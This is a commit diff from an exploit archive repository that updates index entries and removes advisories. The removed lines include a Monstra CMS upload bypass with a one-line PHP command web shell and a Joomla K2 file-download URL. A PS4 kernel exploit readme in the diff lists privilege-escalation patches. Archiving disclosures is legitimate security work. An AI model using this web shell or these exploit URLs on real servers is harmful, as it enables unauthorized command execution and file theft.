DB: 2018-03-02
9 changes to exploits/shellcodes Nintendo Switch - WebKit Code Execution (PoC) Nintendo Switch - WebKit Code Execution (PoC) Monstra - Multiple HTML Injection Vulnerabilities Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities Monstra CMS - 'login' SQL Injection Monstra CMS 1.2.0 - 'login' SQL Injection Monstra CMS - Remote Code Execution Joomla! Component K2 2.8.0 - Arbitrary File Download
This commit is contained in:
parent
6885f2dcc7
commit
b42c3d0ecd
6 changed files with 11 additions and 69 deletions
|
@ -10,11 +10,15 @@ The following patches are made by default in the kernel ROP chain:
|
|||
1) Disable kernel write protection
|
||||
2) Allow RWX (read-write-execute) memory mapping
|
||||
3) Syscall instruction allowed anywhere
|
||||
4) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
|
||||
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
|
||||
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
|
||||
|
||||
## Notes
|
||||
- Early stages, so no payloads yet, I may provide a debug menu payload later on in the day.
|
||||
- Payloads from 4.05 should be fairly trivial to port unless they use hardcoded kernel offsets
|
||||
- I've built in a patch so the kernel exploit will only run once on the system, you can make additional patches via payloads.
|
||||
- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.
|
||||
|
||||
|
||||
## Contributors
|
||||
Massive credits to the following:
|
||||
|
@ -23,4 +27,4 @@ Massive credits to the following:
|
|||
- [Flatz](https://twitter.com/flat_z)
|
||||
- Anonymous
|
||||
|
||||
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196.zip
|
||||
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196-v2.zip
|
|
@ -1,10 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/55171/info
|
||||
<!--source: http://www.securityfocus.com/bid/55171/info
|
||||
|
||||
Monstra is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
Monstra 1.2.1 is vulnerable; other versions may also be affected.
|
||||
Monstra 1.2.1 is vulnerable; other versions may also be affected. -->
|
||||
|
||||
<html>
|
||||
<head>
|
||||
|
|
|
@ -1,37 +0,0 @@
|
|||
## Vulnerabilities Summary
|
||||
The following advisory describes a vulnerability found in Monstra CMS.
|
||||
|
||||
Monstra is “a modern and lightweight Content Management System. It is Easy to install, upgrade and use.”
|
||||
|
||||
The vulnerability found is a remote code execution vulnerability through an arbitrary file upload mechanism.
|
||||
|
||||
## Credit
|
||||
An independent security researcher, Ishaq Mohammed, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
|
||||
|
||||
## Vendor response
|
||||
We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support – though this is not an official status on their site (last official patch was released on 2012-11-29), the github appears a bit more active (last commit from 2 years ago).
|
||||
|
||||
Without any vendor response the researcher was kind enough to create a patch that addresses this bug, its available here: https://github.com/monstra-cms/monstra/issues/426
|
||||
|
||||
CVE: CVE-2017-18048
|
||||
|
||||
## Vulnerabilities details
|
||||
An editor can upload files to the Monstra CMS and can access them by clicking on them from the administrator portal. The default setup of Monstra CMS allows uploading of files only with certain extensions, forbidding all types of executable files which are mentioned in monstra\plugins\box\filesmanager\filesmanager.admin.php. However by simply uploading a php file with “PHP” (all characters in uppercase) extension will bypass this mechanism and will allow an attacker to execute shell commands on the server.
|
||||
|
||||
## Proof of Concept
|
||||
|
||||
Steps to Reproduce:
|
||||
|
||||
Login with a valid credentials of an Editor
|
||||
Select Files option from the Dropdown menu of Content
|
||||
Upload a file with PHP (uppercase)extenstion contaiing the below code:
|
||||
|
||||
```
|
||||
<?php
|
||||
$cmd=$_GET['cmd'];
|
||||
system($cmd);
|
||||
?>
|
||||
```
|
||||
Click on Upload
|
||||
|
||||
liOnce the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc.
|
|
@ -1,23 +0,0 @@
|
|||
# # # #
|
||||
# Exploit Title: Joomla! Component K2 2.8.0 - Arbitrary File Download
|
||||
# Dork: N/A
|
||||
# Date: 26.02.2018
|
||||
# Vendor Homepage: http://www.joomlaworks.net/
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/k2/
|
||||
# Software Download: https://getk2.org/downloads/?f=K2_v2.8.0.zip
|
||||
# Version: 2.8.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-7482
|
||||
# # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# # # #
|
||||
#
|
||||
# POC:
|
||||
#
|
||||
# The vulnerability allows an users to arbitrary download files..
|
||||
#
|
||||
# 1)
|
||||
# http://localhost/[PATH]/index.php?option=com_k2&view=media&task=connector&cmd=file&target=l1_[FILE_BASE64]&download=1&[TOKEN]=1
|
||||
#
|
||||
# # # #
|
|
@ -5881,6 +5881,7 @@ id,file,description,date,author,type,platform,port
|
|||
44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,
|
||||
44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
|
||||
44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
|
||||
44213,exploits/hardware/dos/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,qwertyoruiop,dos,hardware,
|
||||
44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
|
@ -9554,7 +9555,6 @@ id,file,description,date,author,type,platform,port
|
|||
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
|
||||
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
|
||||
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
|
||||
44213,exploits/hardware/local/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,LiveOverflow,local,hardware,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -36029,7 +36029,7 @@ id,file,description,date,author,type,platform,port
|
|||
37648,exploits/php/webapps/37648.txt,"Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,webapps,php,
|
||||
37649,exploits/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,webapps,php,
|
||||
37650,exploits/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' SQL Injection",2012-08-22,kallimero,webapps,php,
|
||||
37651,exploits/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,
|
||||
37651,exploits/php/webapps/37651.html,"Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,
|
||||
37652,exploits/php/webapps/37652.txt,"KindEditor - 'name' Cross-Site Scripting",2012-08-23,LiquidWorm,webapps,php,
|
||||
37653,exploits/php/webapps/37653.txt,"WordPress Plugin Rich Widget - Arbitrary File Upload",2012-08-22,Crim3R,webapps,php,
|
||||
37654,exploits/php/webapps/37654.txt,"WordPress Plugin Monsters Editor for WP Super Edit - Arbitrary File Upload",2012-08-22,Crim3R,webapps,php,
|
||||
|
@ -36583,7 +36583,7 @@ id,file,description,date,author,type,platform,port
|
|||
38765,exploits/php/webapps/38765.txt,"Horde Groupware 5.2.10 - Cross-Site Request Forgery",2015-11-19,"High-Tech Bridge SA",webapps,php,80
|
||||
38767,exploits/php/webapps/38767.txt,"WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,webapps,php,
|
||||
38768,exploits/php/webapps/38768.txt,"WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,webapps,php,
|
||||
38769,exploits/php/webapps/38769.txt,"Monstra CMS - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php,
|
||||
38769,exploits/php/webapps/38769.txt,"Monstra CMS 1.2.0 - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php,
|
||||
38770,exploits/php/webapps/38770.txt,"MentalJS - Sandbox Security Bypass",2013-09-20,"Rafay Baloch",webapps,php,
|
||||
38773,exploits/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",webapps,hardware,
|
||||
38781,exploits/php/webapps/38781.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Multiple SQL Injections",2013-10-02,"Yu-Chi Ding",webapps,php,
|
||||
|
@ -38118,7 +38118,6 @@ id,file,description,date,author,type,platform,port
|
|||
44041,exploits/multiple/webapps/44041.txt,"Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution",2017-03-17,SecuriTeam,webapps,multiple,
|
||||
44043,exploits/hardware/webapps/44043.md,"iBall WRA150N - Multiple Vulnerabilities",2018-01-29,SecuriTeam,webapps,hardware,
|
||||
44044,exploits/php/webapps/44044.md,"GitStack - Unauthenticated Remote Code Execution",2018-01-15,SecuriTeam,webapps,php,
|
||||
44045,exploits/php/webapps/44045.md,"Monstra CMS - Remote Code Execution",2017-12-06,SecuriTeam,webapps,php,
|
||||
44050,exploits/php/webapps/44050.md,"Ametys CMS 4.0.2 - Unauthenticated Password Reset",2017-11-07,SecuriTeam,webapps,php,
|
||||
44051,exploits/linux/webapps/44051.md,"DblTek - Multiple Vulnerabilities",2017-11-21,SecuriTeam,webapps,linux,
|
||||
44054,exploits/linux/webapps/44054.md,"FiberHome - Directory Traversal",2017-10-13,SecuriTeam,webapps,linux,
|
||||
|
@ -38932,7 +38931,6 @@ id,file,description,date,author,type,platform,port
|
|||
44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
|
||||
44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php,
|
||||
44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
|
||||
44188,exploits/php/webapps/44188.txt,"Joomla! Component K2 2.8.0 - Arbitrary File Download",2018-02-27,"Ihsan Sencan",webapps,php,
|
||||
44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
|
||||
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
|
||||
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue